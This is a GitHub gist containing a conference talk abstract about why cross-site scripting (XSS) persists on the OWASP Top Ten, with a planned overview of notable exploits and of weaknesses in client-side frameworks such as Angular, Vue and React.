Skip to content

Instantly share code, notes, and snippets.

@al-the-x
Last active May 24, 2018 13:33
Show Gist options
  • Save al-the-x/dc1a1b41a648562fb8068699ef6e03be to your computer and use it in GitHub Desktop.
Save al-the-x/dc1a1b41a648562fb8068699ef6e03be to your computer and use it in GitHub Desktop.
Abstract for "You XSS Your Life! -- How do we keep failing at security on the web?" for submission to HelpMeAbstract.com

You XSS Your Life! -- How do we keep failing at security on the web?

The Open Web Application Security Project (OWASP) has compiled a Top Ten list of security vulnerabilities every few years since 2003. One specific vulnerability has persistently appeared on every list: Cross-Site Scripting (XSS) aka the injection of malicious JavaScript. JavaScript is quickly becoming the most popular –– or possibly most used –– programming language in the world; more developers and tools are joining the ecosystem every day.

Despite over 10 years of awareness through highly visible exploits and education through OWASP Top Ten, despite thousands of new and experienced developers entering the field of JavaScript over that decade, and despite fancy new tools and frameworks meant to protect us from XSS, how can XSS really have raised in rank on the vulnerability list?

In this presentation, I'll break down how XSS works in theory and in practice, what the OWASP Top Ten is and why it's important, tell some stories about notable exploits over the last 10 years, and demonstrate some lesser-known vulnerabilities in client-side rendering libraries like Angular, Vue, and even React that bite developers practically every day.

@al-the-x
Copy link
Author

Comments managed via https://giscus.co

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment